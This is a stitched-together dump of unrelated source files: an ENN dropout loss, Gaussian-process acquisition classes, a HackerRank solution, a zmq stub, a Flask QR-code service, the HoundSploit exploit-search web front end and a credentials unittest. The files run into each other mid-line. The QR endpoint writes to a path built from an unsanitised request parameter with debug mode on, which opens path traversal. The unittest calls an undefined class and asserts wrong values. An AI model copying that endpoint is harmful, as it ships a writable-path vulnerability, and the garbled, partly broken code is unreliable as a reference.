a Bayesian Approximation: Representing Model Uncertainty in Deep Learning" (2015).""" def loss_ctor(prior: testbed_base.PriorKnowledge, enn: enn_base.EpistemicNetwork) -> enn_base.LossFn: del enn # Unused if prior.num_classes > 1: single_loss = losses.combine_single_index_losses_as_metric( train_loss=losses.XentLoss(prior.num_classes), extra_losses={'acc': losses.AccuracyErrorLoss(prior.num_classes)}, ) else: single_loss = losses.L2Loss() reg = (scale ** 2) * (1 - dropout_rate) / (2. * prior.num_train * tau) loss_fn = losses.average_single_index_loss(single_loss, num_index_samples) return losses.add_l2_weight_decay(loss_fn, scale=reg) return loss_ctor def combine_loss_prior_loss(loss_fn: enn_base.LossFn, prior_loss_fn: Optional[enn_base.LossFn] = None, weight: float = 1.) -> enn_base.LossFn: """Compatibility wrapper for deprecated prior_loss_fn interface.""" if prior_loss_fn is None: return loss_fn else: return losses.combine_losses([ losses.CombineLossConfig(loss_fn, 'loss'), losses.CombineLossConfig(prior_loss_fn, 'prior', weight), ]) gpsearch/core/acquisitions/ints.py import numpy as np from .base import Acquisition, AcquisitionWeighted from ..utils import grid_nint, add_xnew, jacobian_fdiff class IVRInt(Acquisition): """A class for IVR computed by numerical integration. Parameters ---------- model, inputs : see parent class (Acquisition) ngrid : int Number of grid points in each direction Attributes ---------- model, inputs, ngrid : see Parameters pts : array Grid points as a vector of size ngrid^dim Notes ----- This class computes IVR by numerical integration on a grid. This is intractable/inaccurate in dimensions greater than 4, so it is intended for debugging purposes only. """ def __init__(self, model, inputs, ngrid=200): super().__init__(model, inputs) self.ngrid = ngrid grd = np.mgrid[ [slice(-5*np.max(np.abs(bd)), 5*np.max(np.abs(bd)), ngrid*1j) \ for bd in inputs.domain] ] self.pts = grd.T.reshape(-1, inputs.input_dim) def evaluate(self, x): x = np.atleast_2d(x) _, var = self.model.predict(x) if self.model.normalizer: var /= self.model.normalizer.std**2 cov = self.model.posterior_covariance_between_points(x, self.pts) wghts = self.get_weights(self.pts) int_cov = grid_nint(self.pts, wghts.flatten() * cov.flatten()**2, ngrid=self.ngrid) return -int_cov/var def jacobian(self, x): return jacobian_fdiff(self, x) class IVR_LWInt(AcquisitionWeighted, IVRInt): """A class for IVR-LW computed by numerical integration. Parameters ---------- model, inputs, likelihood : see parent class (AcquisitionWeighted) ngrid : int Number of grid points in each direction Attributes ---------- model, inputs, likelihood, ngrid : see Parameters pts : array Grid points as a vector of size ngrid^dim Notes ----- This class computes IVR-LW by numerical integration on a grid. This is intractable/inaccurate in dimensions greater than 4, so it is intended for debugging purposes only. """ def __init__(self, model, inputs, likelihood=None, ngrid=200): super().__init__(model, inputs, likelihood=likelihood) self.ngrid = ngrid grd = np.mgrid[ [slice(-5*np.max(np.abs(bd)), 5*np.max(np.abs(bd)), ngrid*1j) \ for bd in inputs.domain] ] self.pts = grd.T.reshape(-1, inputs.input_dim) class QInt(AcquisitionWeighted): """A class for the Q criterion computed by numerical integration. Parameters ---------- model, inputs, likelihood : see parent class (AcquisitionWeighted) ngrid : int Number of grid points in each direction Attributes ---------- model, inputs, likelihood, ngrid : see Parameters pts : array Grid points as a vector of size ngrid^dim Notes ----- This class computes Q by numerical integration on a grid. This is intractable/inaccurate in dimensions greater than 4, so it is intended for debugging purposes only. """ def __init__(self, model, inputs, likelihood=None, ngrid=200): super().__init__(model, inputs, likelihood=likelihood) self.ngrid = ngrid grd = np.mgrid[ [slice(-5*np.max(np.abs(bd)), 5*np.max(np.abs(bd)), ngrid*1j) \ for bd in inputs.domain] ] self.pts = grd.T.reshape(-1, inputs.input_dim) def evaluate(self, x): x = np.atleast_2d(x) gpn = add_xnew(x, self.model) _, var_new = gpn.predict(self.pts) wghts = np.exp(self.likelihood.gmm.score_samples(self.pts)) qdx = wghts * var_new.flatten() # Normalize by current variance if gpn.normalizer: qdx /= gpn.normalizer.std**2 Q = grid_nint(self.pts, qdx, ngrid=self.ngrid) return Q def jacobian(self, x): return jacobian_fdiff(self, x) #!/bin/python3 import sys def getTotalX(a, b): # Complete this function if max(a) > min(b): return 0 if max(a) == min(b): return 1 pb_list = list(range(max(a), min(b) + 1)) rm_list = [] for p in pb_list: for ta in a: if p % ta != 0: rm_list.append(p) break for p in pb_list: for tb in b: if tb % p != 0: rm_list.append(p) break rm_list = list(set(rm_list)) return len(pb_list) - len(rm_list) if __name__ == "__main__": n, m = input().strip().split(' ') n, m = [int(n), int(m)] a = list(map(int, input().strip().split(' '))) b = list(map(int, input().strip().split(' '))) total = getTotalX(a, b) print(total) src/trade/engine.py """ Main file that uses zmq message queue and an infinite loop to implement the trading engine with strategies and analysis. """ import zmq from utilities import logger log = logger.get_logger_config(__name__) def run() -> None: # Setup zmq variables. ctx = zmq.Context() log.info("Connecting to the data server...") socket = ctx.socket(zmq.REQ) socket.connect("tcp://localhost:5555") # Initial testing. Loop 10 times for each request. for request in range(10): log.info("Send request %d..." % request) socket.send(b"{engine data}.") # Obtain reply. message = socket.recv() log.info("Received reply %s [ %s ]" % (request, message))script.py import pyqrcode import png import flask from pyqrcode import QRCode from flask import request app = flask.Flask(__name__) app.config["DEBUG"] = True @app.route( '/qr-code', methods=['GET'] ) def genQR(): if 'string' in request.args: QRString = request.args['string'] else: return "You must provide a string." if 'fileName' in request.args: fileName = request.args['fileName'] else: return "You must provide a file name" # QRString = 'https://www.alegreshow.com.br' url = pyqrcode.create(QRString) url.png(r'qr-codes/' + fileName + '.png', scale = 8) return "" app.run()#- # flipper_tools.py #- # import numpy as np import os def read_bin_edges(bin_file, skiprows=0): print("[flipper_tools] loading %s" %bin_file) assert(os.path.exists(bin_file)) (lower, upper, center) = np.loadtxt(bin_file, skiprows=skiprows, unpack=True) return np.concatenate((lower[0:1], upper)) tristan-white/dhtnetwork.py # reads from socket until "\r\n" def read_from_socket(s): result = "" while 1: data = s.recv(256) if data[-2:] == "\r\n": result += data[:-2] break result += data # if result != "": # print "read : %s" % result return result # sends all on socket, adding "\r\n" def send_to_socket(s, msg): # print "respond : %s" % msg s.sendall(str(msg) + "\r\n") import os import shutil import sys import datetime import platform from flask import Flask, render_template, request from HoundSploit.searcher.engine.search_engine import search_vulnerabilities_in_db, get_exploit_by_id, get_shellcode_by_id,\ get_vulnerability_extension, get_vulnerability_filters, search_vulnerabilities_advanced from HoundSploit.searcher.engine.keywords_highlighter import highlight_keywords_in_description, highlight_keywords_in_file, \ highlight_keywords_in_port from HoundSploit.searcher.engine.suggestions import substitute_with_suggestions, propose_suggestions, get_suggestions_list,\ new_suggestion, remove_suggestion, DEFAULT_SUGGESTIONS from HoundSploit.searcher.engine.updates import get_latest_db_update_date, install_updates from HoundSploit.searcher.engine.utils import check_file_existence, get_vulnerability_extension, get_n_needed_pages from HoundSploit.searcher.engine.csv2sqlite import create_db from HoundSploit.searcher.engine.sorter import sort_results from HoundSploit.searcher.engine.bookmarks import new_bookmark, is_bookmarked, remove_bookmark, get_bookmarks_list from HoundSploit.searcher.engine.fix_dates import fix_dates, create_fixed_db from shutil import copyfile init_path = os.path.abspath(os.path.expanduser("~") + "/.HoundSploit") template_dir = os.path.abspath(init_path + '/houndsploit/HoundSploit/templates') static_folder = os.path.abspath(init_path + '/houndsploit/HoundSploit/static') app = Flask(__name__, template_folder=template_dir, static_folder=static_folder) N_RESULTS_FOR_PAGE = 10 @app.route('/', methods=['GET', 'POST']) def get_results_table(): """ Render a table with a list of search results. :return: results_table.html template with search results. """ if request.method == 'POST': current_exploits_page = request.form['hid-e-page'] current_view = request.form['current-view'] try: current_exploits_page = int(current_exploits_page) except ValueError: current_exploits_page = 1 current_shellcodes_page = request.form['hid-s-page'] current_view = request.form['current-view'] try: current_shellcodes_page = int(current_shellcodes_page) except ValueError: current_shellcodes_page = 1 sorting_type = request.form['sorting-type'] searched_text = request.form['searched-text'] searched_text = substitute_with_suggestions(searched_text) suggested_search_text = propose_suggestions(searched_text) if str(searched_text).isspace() or searched_text == "": return render_template('home.html', current_exploits_page=1, current_shellcodes_page=1, sorting_type="Most recent") key_words_list = (str(searched_text).upper()).split() exploits_list = search_vulnerabilities_in_db(searched_text, 'searcher_exploit') exploits_list = sort_results(exploits_list, sorting_type) n_exploits = len(exploits_list) latest_exploits_page = get_n_needed_pages(n_exploits) if current_exploits_page < 1: current_exploits_page = 1 index_first_result = 0 elif current_exploits_page > latest_exploits_page: current_exploits_page = latest_exploits_page index_first_result = (int(current_exploits_page) - 1) * N_RESULTS_FOR_PAGE else: index_first_result = (int(current_exploits_page) - 1) * N_RESULTS_FOR_PAGE index_last_result = index_first_result + N_RESULTS_FOR_PAGE exploits_list = exploits_list[index_first_result:index_last_result] for result in exploits_list: if result.port is None: result.port = '' shellcodes_list = search_vulnerabilities_in_db(searched_text, 'searcher_shellcode') shellcodes_list = sort_results(shellcodes_list, sorting_type) n_shellcodes = len(shellcodes_list) latest_shellcodes_page = get_n_needed_pages(n_shellcodes) if current_shellcodes_page < 1: current_shellcodes_page = 1 index_first_result = 0 elif current_shellcodes_page > latest_shellcodes_page: current_shellcodes_page = latest_shellcodes_page index_first_result = (int(current_shellcodes_page) - 1) * N_RESULTS_FOR_PAGE else: index_first_result = (int(current_shellcodes_page) - 1) * N_RESULTS_FOR_PAGE index_last_result = index_first_result + N_RESULTS_FOR_PAGE shellcodes_list = shellcodes_list[index_first_result:index_last_result] if str(searched_text).isnumeric(): exploits_list = highlight_keywords_in_file(key_words_list, exploits_list) shellcodes_list = highlight_keywords_in_file(key_words_list, shellcodes_list) exploits_list = highlight_keywords_in_port(key_words_list, exploits_list) exploits_list = highlight_keywords_in_description(key_words_list, exploits_list) shellcodes_list = highlight_keywords_in_description(key_words_list, shellcodes_list) return render_template('results_table.html', searched_item=searched_text, exploits_list=exploits_list, shellcodes_list=shellcodes_list, searched_text=searched_text, suggested_search_text=suggested_search_text, n_exploits=n_exploits, current_exploits_page=current_exploits_page, latest_exploits_page=latest_exploits_page, current_view=current_view, n_shellcodes=n_shellcodes, current_shellcodes_page=current_shellcodes_page, latest_shellcodes_page=latest_shellcodes_page, sorting_type=sorting_type) else: return render_template('home.html', current_exploits_page=1, current_shellcodes_page=1, sorting_type="Most recent") @app.route('/advanced-search', methods=['GET', 'POST']) def get_results_table_advanced(): """ Render a table with a list of search results. :return: results_table.html template with search results. """ vulnerability_types_list, vulnerability_platforms_list = get_vulnerability_filters() if request.method == 'POST': current_exploits_page = request.form['hid-e-page'] current_view = request.form['current-view'] try: current_exploits_page = int(current_exploits_page) except ValueError: current_exploits_page = 1 current_shellcodes_page = request.form['hid-s-page'] current_view = request.form['current-view'] try: current_shellcodes_page = int(current_shellcodes_page) except ValueError: current_shellcodes_page = 1 sorting_type = request.form['sorting-type'] searched_text = request.form['searched-text'] operator_filter = request.form['search-operator'] author_filter = request.form['author'] type_filter = request.form['type'] platform_filter = request.form['platform'] port_filter = request.form['port'] date_from_filter = request.form['date-from'] date_to_filter = request.form['date-to'] searched_text = substitute_with_suggestions(searched_text) suggested_search_text = propose_suggestions(searched_text) if str(searched_text).isspace() or searched_text == "": return render_template('advanced_searcher.html', vulnerability_types_list=vulnerability_types_list, vulnerability_platforms_list=vulnerability_platforms_list, current_exploits_page=1, current_shellcodes_page=1, sorting_type="Most recent") key_words_list = (str(searched_text).upper()).split() date_alert = None try: date_from = datetime.datetime.strptime(date_from_filter, '%Y-%m-%d') date_to = datetime.datetime.strptime(date_to_filter, '%Y-%m-%d') if date_from > date_to: date_from_filter = "mm/dd/yyyy" date_to_filter = "mm/dd/yyyy" date_alert = "ERROR: date range not valid!" except ValueError: date_from_filter = "mm/dd/yyyy" date_to_filter = "mm/dd/yyyy" exploits_list = search_vulnerabilities_advanced(searched_text, 'searcher_exploit', operator_filter, type_filter, platform_filter, author_filter, port_filter, date_from_filter, date_to_filter) exploits_list = sort_results(exploits_list, sorting_type) n_exploits = len(exploits_list) latest_exploits_page = get_n_needed_pages(n_exploits) if current_exploits_page < 1: current_exploits_page = 1 index_first_result = 0 elif current_exploits_page > latest_exploits_page: current_exploits_page = latest_exploits_page index_first_result = (int(current_exploits_page) - 1) * N_RESULTS_FOR_PAGE else: index_first_result = (int(current_exploits_page) - 1) * N_RESULTS_FOR_PAGE index_last_result = index_first_result + N_RESULTS_FOR_PAGE exploits_list = exploits_list[index_first_result:index_last_result] for result in exploits_list: if result.port is None: result.port = '' shellcodes_list = search_vulnerabilities_advanced(searched_text, 'searcher_shellcode', operator_filter, type_filter, platform_filter, author_filter, port_filter, date_from_filter, date_to_filter) shellcodes_list = sort_results(shellcodes_list, sorting_type) n_shellcodes = len(shellcodes_list) latest_shellcodes_page = get_n_needed_pages(n_shellcodes) if current_shellcodes_page < 1: current_shellcodes_page = 1 index_first_result = 0 elif current_shellcodes_page > latest_shellcodes_page: current_shellcodes_page = latest_shellcodes_page index_first_result = (int(current_shellcodes_page) - 1) * N_RESULTS_FOR_PAGE else: index_first_result = (int(current_shellcodes_page) - 1) * N_RESULTS_FOR_PAGE index_last_result = index_first_result + N_RESULTS_FOR_PAGE shellcodes_list = shellcodes_list[index_first_result:index_last_result] if str(searched_text).isnumeric(): exploits_list = highlight_keywords_in_file(key_words_list, exploits_list) shellcodes_list = highlight_keywords_in_file(key_words_list, shellcodes_list) exploits_list = highlight_keywords_in_port(key_words_list, exploits_list) exploits_list = highlight_keywords_in_description(key_words_list, exploits_list) shellcodes_list = highlight_keywords_in_description(key_words_list, shellcodes_list) return render_template('advanced_results_table.html', searched_item=searched_text, exploits_list=exploits_list, shellcodes_list=shellcodes_list, searched_text=searched_text, vulnerability_types_list=vulnerability_types_list, vulnerability_platforms_list=vulnerability_platforms_list, operator_filter=operator_filter, author_filter=author_filter, type_filter=type_filter, platform_filter=platform_filter, port_filter=port_filter, date_from_filter=date_from_filter, date_to_filter=date_to_filter, suggested_search_text=suggested_search_text, date_alert=date_alert, n_exploits=n_exploits, current_exploits_page=current_exploits_page, latest_exploits_page=latest_exploits_page, current_view=current_view, n_shellcodes=n_shellcodes, current_shellcodes_page=current_shellcodes_page, latest_shellcodes_page=latest_shellcodes_page, sorting_type=sorting_type) else: return render_template('advanced_searcher.html', vulnerability_types_list=vulnerability_types_list, vulnerability_platforms_list=vulnerability_platforms_list, current_exploits_page=1, current_shellcodes_page=1, sorting_type="Most recent") @app.route('/exploit-details') def view_exploit_details(): """ Open details about the selected exploit, included the source code. :return: a template showing the details about the selected exploit and the source code. """ vulnerability_class = "exploit" exploit_id = request.args.get('exploit-id', None) searched_text = request.args.get('searched-text', None) is_prev_page_bookmarks = request.args.get('isprevpagebookmarks', None) if is_prev_page_bookmarks == "true": is_prev_page_bookmarks = True else: is_prev_page_bookmarks = False exploit = get_exploit_by_id(exploit_id) if exploit is None: error_msg = 'Sorry! This exploit does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + exploit.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=exploit.description, vulnerability_file=exploit.file, vulnerability_author=exploit.author, vulnerability_date=exploit.date, vulnerability_type=exploit.type, vulnerability_platform=exploit.platform, vulnerability_port=exploit.port, file_path=file_path, exploit_id=exploit_id, bookmarked=is_bookmarked(exploit_id, vulnerability_class), searched_text=searched_text, is_prev_page_bookmarks=is_prev_page_bookmarks) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/download-exploit') def download_exploit_details(): """ Download the selected exploit. :return: a template showing the details about the selected exploit and the source code. """ vulnerability_class = "exploit" exploit_id = request.args.get('exploit-id', None) exploit = get_exploit_by_id(exploit_id) if exploit is None: error_msg = 'Sorry! This exploit does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + exploit.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) copyfile(file_path, os.path.expanduser("~") + "/exploit_" + exploit_id + get_vulnerability_extension(exploit.file)) download_alert = "exploit_" + exploit_id + get_vulnerability_extension(exploit.file) + " has been downloaded in your home directory" return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=exploit.description, vulnerability_file=exploit.file, vulnerability_author=exploit.author, vulnerability_date=exploit.date, vulnerability_type=exploit.type, vulnerability_platform=exploit.platform, vulnerability_port=exploit.port, file_path=file_path, download_alert=download_alert, exploit_id=exploit_id, bookmarked=is_bookmarked(exploit_id, vulnerability_class)) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/shellcode-details') def view_shellcode_details(): """ Open details about the selected shellcode, included the source code. :return: a template showing the details about the selected shellcode and the source code. """ vulnerability_class = "shellcode" shellcode_id = request.args.get('shellcode-id', None) searched_text = request.args.get('searched-text', None) is_prev_page_bookmarks = request.args.get('isprevpagebookmarks', None) if is_prev_page_bookmarks == "true": is_prev_page_bookmarks = True else: is_prev_page_bookmarks = False shellcode = get_shellcode_by_id(shellcode_id) if shellcode is None: error_msg = 'Sorry! This shellcode does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + shellcode.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=shellcode.description, vulnerability_file=shellcode.file, vulnerability_author=shellcode.author, vulnerability_date=shellcode.date, vulnerability_type=shellcode.type, vulnerability_platform=shellcode.platform, file_path=file_path, shellcode_id=shellcode_id, bookmarked=is_bookmarked(shellcode_id, vulnerability_class), searched_text=searched_text, is_prev_page_bookmarks=is_prev_page_bookmarks) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/download-shellcode') def download_shellcode(): """ Download the selected shellcode. :return: a template showing the details about the selected shellcode and the source code. """ vulnerability_class = "shellcode" shellcode_id = request.args.get('shellcode-id', None) shellcode = get_shellcode_by_id(shellcode_id) if shellcode is None: error_msg = 'Sorry! This shellcode does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + shellcode.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) copyfile(file_path, os.path.expanduser("~") + "/shellcode_" + shellcode_id + get_vulnerability_extension(shellcode.file)) download_alert = "shellcode_" + shellcode_id + get_vulnerability_extension(shellcode.file) + " has been downloaded in your home directory" return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=shellcode.description, vulnerability_file=shellcode.file, vulnerability_author=shellcode.author, vulnerability_date=shellcode.date, vulnerability_type=shellcode.type, vulnerability_platform=shellcode.platform, file_path=file_path, download_alert=download_alert, shellcode_id=shellcode_id, bookmarked=is_bookmarked(shellcode_id, vulnerability_class)) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/settings') def settings(): """ Show settings page :return: settings templates """ return render_template('settings.html', latest_db_update=get_latest_db_update_date()) @app.route('/update') def get_updates(): """ Check and download new updates for the software and the database :return: settings templates """ install_updates() if check_file_existence(init_path + "/houndsploit_db.lock"): if os.path.isdir(init_path + "/fixed_exploitdb"): create_fixed_db() else: if check_file_existence(init_path + "/hound_db.sqlite3"): os.remove(init_path + "/hound_db.sqlite3") create_db() db_update_alert = True else: db_update_alert = False if check_file_existence(init_path + "/houndsploit_sw.lock"): sw_update_alert = True else: sw_update_alert = False if sw_update_alert == False and db_update_alert == False: no_updates_alert = True else: no_updates_alert = False return render_template('settings.html', latest_db_update=get_latest_db_update_date(), db_update_alert=db_update_alert, sw_update_alert=sw_update_alert, no_updates_alert=no_updates_alert) @app.route('/suggestions') def suggestions_manager(): """ Open suggestions manager :return: suggestion manager template """ return render_template('suggestions.html', suggestions=get_suggestions_list(), default_suggestions=DEFAULT_SUGGESTIONS) @app.route('/add-suggestion', methods=['GET', 'POST']) def add_suggestion(): """ Add a new suggestion inserted by the user. :return: the 'suggestions.html' template. In case of error it shows an error message. """ if request.method == 'POST': searched = request.form['searched'] suggestion = request.form['suggestion'] autoreplacement = request.form['autoreplacement'] if not str(searched).lower() in DEFAULT_SUGGESTIONS: new_suggestion(searched, suggestion, autoreplacement) return render_template('suggestions.html', suggestions=get_suggestions_list(), default_suggestions=DEFAULT_SUGGESTIONS) else: error = 'ERROR: Default suggestions cannot be modified!' return render_template('suggestions.html', suggestions=get_suggestions_list(), suggestion_error=error, default_suggestions=DEFAULT_SUGGESTIONS) @app.route('/delete-suggestion') def delete_suggestion(): """ Delete a suggestion selected by the user. :return: the 'suggestions.html' template. In case of error it shows an error message. """ searched = request.args.get('searched', None) if str(searched).lower() in DEFAULT_SUGGESTIONS: error = 'ERROR: Default suggestions cannot be deleted!' return render_template('suggestions.html', suggestions=get_suggestions_list(), suggestion_error=error, default_suggestions=DEFAULT_SUGGESTIONS) if remove_suggestion(searched): return render_template('suggestions.html', suggestions=get_suggestions_list(), default_suggestions=DEFAULT_SUGGESTIONS) else: error = 'ERROR: The suggestion you want to delete does not exist!' return render_template('suggestions.html', suggestions=get_suggestions_list(), suggestion_error=error, default_suggestions=DEFAULT_SUGGESTIONS) @app.route('/bookmarks', methods=['GET', 'POST']) def bookmarks_manager(): """ Open bookmarks manager :return: bookmarks manager template """ searched_text = "" bookmarks_list = get_bookmarks_list() key_words_list = [] if request.method == 'POST': searched_text = request.form['searched-text'] current_bookmarks_page = int(request.form['hid-b-page']) else: current_bookmarks_page = 1 searched_text = request.args.get('searched', None) if searched_text is None: searched_text = "" if searched_text != "": key_words_list = (str(searched_text).upper()).split() exploits_list = search_vulnerabilities_in_db(searched_text, 'searcher_exploit') shellcodes_list = search_vulnerabilities_in_db(searched_text, 'searcher_shellcode') results_list = exploits_list + shellcodes_list filtered_bookmarks_list = [] for result in results_list: for bookmark in bookmarks_list: if result.description == bookmark.description: filtered_bookmarks_list.append(bookmark) bookmarks_list = filtered_bookmarks_list n_bookmarks = len(bookmarks_list) latest_bookmarks_page = get_n_needed_pages(n_bookmarks) if current_bookmarks_page < 1: current_bookmarks_page = 1 index_first_result = 0 elif current_bookmarks_page > latest_bookmarks_page: current_bookmarks_page = latest_bookmarks_page index_first_result = (int(current_bookmarks_page) - 1) * N_RESULTS_FOR_PAGE else: index_first_result = (int(current_bookmarks_page) - 1) * N_RESULTS_FOR_PAGE index_last_result = index_first_result + N_RESULTS_FOR_PAGE bookmarks_list = bookmarks_list[index_first_result:index_last_result] bookmarks_list = highlight_keywords_in_description(key_words_list, bookmarks_list) return render_template('bookmarks.html', searched_text=searched_text, bookmarks_list=bookmarks_list, current_bookmarks_page=current_bookmarks_page, latest_bookmarks_page=latest_bookmarks_page) @app.route('/bookmark-exploit') def bookmark_exploit(): """ Bookmark the selected exploit. :return: a template showing the details about the selected exploit and the source code. """ vulnerability_class = "exploit" exploit_id = request.args.get('exploit-id', None) exploit = get_exploit_by_id(exploit_id) if exploit is None: error_msg = 'Sorry! This exploit does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + exploit.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) if new_bookmark(exploit_id, vulnerability_class): return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=exploit.description, vulnerability_file=exploit.file, vulnerability_author=exploit.author, vulnerability_date=exploit.date, vulnerability_type=exploit.type, vulnerability_platform=exploit.platform, vulnerability_port=exploit.port, file_path=file_path, exploit_id=exploit_id, bookmarked=is_bookmarked(exploit_id, vulnerability_class)) else: error_msg = 'Sorry! This exploit does not exist :(' return render_template('error_page.html', error=error_msg) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/remove-bookmark-exploit') def remove_bookmark_exploit(): """ Remove the bookmark for the selected exploit. :return: a template showing the details about the selected exploit and the source code. """ vulnerability_class = "exploit" exploit_id = request.args.get('exploit-id', None) exploit = get_exploit_by_id(exploit_id) if exploit is None: error_msg = 'Sorry! This exploit does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + exploit.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) test = remove_bookmark(exploit_id, vulnerability_class) return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=exploit.description, vulnerability_file=exploit.file, vulnerability_author=exploit.author, vulnerability_date=exploit.date, vulnerability_type=exploit.type, vulnerability_platform=exploit.platform, vulnerability_port=exploit.port, file_path=file_path, exploit_id=exploit_id, bookmarked=is_bookmarked(exploit_id, vulnerability_class)) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/bookmark-shellcode') def bookmark_shellcode(): """ Bookmark the selected shellcode. :return: a template showing the details about the selected shellcode and the source code. """ vulnerability_class = "shellcode" shellcode_id = request.args.get('shellcode-id', None) shellcode = get_shellcode_by_id(shellcode_id) if shellcode is None: error_msg = 'Sorry! This shellcode does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + shellcode.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) if new_bookmark(shellcode_id, vulnerability_class): return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=shellcode.description, vulnerability_file=shellcode.file, vulnerability_author=shellcode.author, vulnerability_date=shellcode.date, vulnerability_type=shellcode.type, vulnerability_platform=shellcode.platform, file_path=file_path, shellcode_id=shellcode_id, bookmarked=is_bookmarked(shellcode_id, vulnerability_class)) else: error_msg = 'Sorry! This shellcode does not exist :(' return render_template('error_page.html', error=error_msg) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/remove-bookmark-shellcode') def remove_bookmark_shellcode(): """ Remove the bookmark for the selected shellcode. :return: a template showing the details about the selected shellcode and the source code. """ vulnerability_class = "shellcode" shellcode_id = request.args.get('shellcode-id', None) shellcode = get_shellcode_by_id(shellcode_id) if shellcode is None: error_msg = 'Sorry! This shellcode does not exist :(' return render_template('error_page.html', error=error_msg) file_path = init_path + "/exploitdb/" + shellcode.file try: with open(file_path, 'r') as f: content = f.readlines() vulnerability_code = ''.join(content) remove_bookmark(shellcode_id, vulnerability_class) return render_template('code_viewer.html', vulnerability_code=vulnerability_code, vulnerability_description=shellcode.description, vulnerability_file=shellcode.file, vulnerability_author=shellcode.author, vulnerability_date=shellcode.date, vulnerability_type=shellcode.type, vulnerability_platform=shellcode.platform, file_path=file_path, shellcode_id=shellcode_id, bookmarked=is_bookmarked(shellcode_id, vulnerability_class)) except FileNotFoundError: error_msg = 'Sorry! This file does not exist :(' return render_template('error_page.html', error=error_msg) @app.route('/fix-dates') def repair_dates(): # print("Starting fix") fix_dates() # print("Ending fix") return render_template('settings.html', latest_db_update=get_latest_db_update_date(), db_update_alert=False, sw_update_alert=False, no_updates_alert=False) @app.route('/restore-exploitdb') def restore_exploitdb(): # print("Starting fix") if platform.system() == "Windows": script_path = os.path.abspath(init_path + "/houndsploit/HoundSploit/scripts/restore_exploitdb.ps1") os.system("powershell.exe -ExecutionPolicy Bypass -File " + script_path) # print("Ending fix") return render_template('error_page.html', error="Please restart the application server for applying changes!") else: fixed_exploitdb_path = os.path.abspath(init_path + "/fixed_exploitdb") db_path = os.path.abspath(init_path + "/hound_db.sqlite3") shutil.rmtree(fixed_exploitdb_path) os.remove(db_path) create_db() # print("Ending fix") return render_template('settings.html', latest_db_update=get_latest_db_update_date(), db_update_alert=False, sw_update_alert=False, no_updates_alert=False) def start_app(): # app.run(debug=True, host='0.0.0.0') app.run(debug=False) import unittest import pyperclip from credentials import Credential class TestCredentials(unittest.TestCase): ''' Test class that defines test cases for the credentials class behaviours. Args: unittest.TestCase: TestCase class that helps in creating test cases ''' def setUp(self): ''' Set up method to run before each test cases. ''' self.new_cred = Credential("gigi","4444","facebook","") def test_init(self): ''' test_init test case to test if the object is initialized properly ''' self.assertEqual(self.new_cred.username,"gigi") self.assertEqual(self.new_cred.password,"") self.assertEqual(self.new_cred.new_account,"facebook") self.assertEqual(self.new_cred.email,"") def test_save(self): ''' test_save_data test case to test if the object is saved into the cred... list ''' self.new_cred.keeped() # saving the new data instagram=Credential('aline','aline','instagram','aline@hhh') instagram.keeped() self.assertEqual(len(Credential.list_cred),1) def tearDown(self): ''' tearDown method that does clean up after each test case has run. ''' Credential.list_cred= [] def test_save_multiple(self): ''' test_save_multiple_data to check if we can save multiple credentials objects to our cred_list ''' self.new_cred.keeped() test_cred = Credential("ally","3333","wastap","") # new data test_cred.keeped() self.assertEqual(len(Credential.list_cred),2) def test_display(self): ''' display users ''' self.assertEqual(Locker.display(),Locker.locker_list) def test_diplay_cred(self): ''' method to display credentials ''' self.new_cred.keeped() instagram=Credential("aline","aline","instragram","aline") instagram.keeped() self.assertEqual(len(Credential.excute(instagram.username)),1) def test_delete(self): ''' test_delete to test if we can remove a data from our cred list ''' self.new_cred.keeped() test_cred = Credential("ally","3333","wastap","") # new data test_cred.keeped() self.new_cred.remove()# Deleting a data object self.assertEqual(len(Credential.list_cred),1) def test_find(self): ''' test to check if we can find a data by using name and display information ''' self.new_cred.keeped() test_cred = Credential("ally","3333","wastap","") # new contact test_cred.keeped() find_name = Credential.find_username("ally") self.assertEqual(find_name.new_account,test_cred.new_account) def test_exists(self): ''' test to check if we can return a Boolean if we cannot find the our object. ''' self.new_cred.keeped() test_cred = Credential("gigi","4444","facebook","") test_cred.keeped() existing = Credential.cred_exists("gigi") self.assertTrue(existing) def test_display(self): ''' method that returns a list of all objects saved ''' self.new_cred.keeped() instagram=Credential("bebe","3333","twitter","") instagram.keeped() self.assertEqual(len(Credential.excute(instagram.username)),1) def copy_name(self): ''' Test to confirm that we are copying the name address from our data ''' 